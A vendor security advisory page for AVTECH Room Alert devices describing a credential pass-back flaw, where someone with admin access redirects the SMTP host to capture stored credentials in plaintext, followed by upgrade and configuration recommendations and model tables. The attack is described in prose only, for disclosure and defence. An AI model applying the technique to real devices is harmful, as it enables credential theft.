Knowledge Base / Security Advisories
Impacted Devices and Firmware:
Summary:
Changing the mail server within the device allows the configured credentials to be sent in plaintext to an attacker via credential pass-back attack.
Description:
An individual with administrative access can change the mail server host within the device. An attacker who has obtained administrative access can update the mail server to an attacker controller IP. When the device attempts to authenticate to the mail server, it will pass the previously configured credentials in plaintext to the attacker’s IP.
Recommendation:
For users of S-models, upgrade to firmware 1.10.4 or higher which requires SMTP credentials to be re-entered whenever the mail server host is changed. Regardless of the model, AVTECH strongly recommends that users set custom administrative credentials on the device to restrict access to all settings, including SMTP settings. When using E-models, use Room Alert Account or Room Alert Manager, where possible, to send email notifications instead of sending them directly from the device. If the device is not being used to send emails, ensure any SMTP credentials have been removed from the device.
We'd love to talk with you about your monitoring needs. Contact one of our Product Specialists for a free consultation.
You may find Windows Command Prompt at the following path:
To run Windows Command Prompt as an administrator:
If you are using this client, you should configure the general SNMPv3 Credentials, but leave the Read / Write SNMPv3 Credentials section blank.
| Current S models | Current E models |
|---|---|
| Room Alert 32S | Room Alert 32E |
| Room Alert 12S | Room Alert 12E |
| Room Alert 4E | |
| Room Alert 3E | |
| Current S models | Current E models |
|---|---|
| Room Alert 32S | Room Alert 32E |
| Room Alert 12S | Room Alert 12E |
| Room Alert 3S | Room Alert 4E |
| Room Alert 3E | |
| Room Alert 3W |
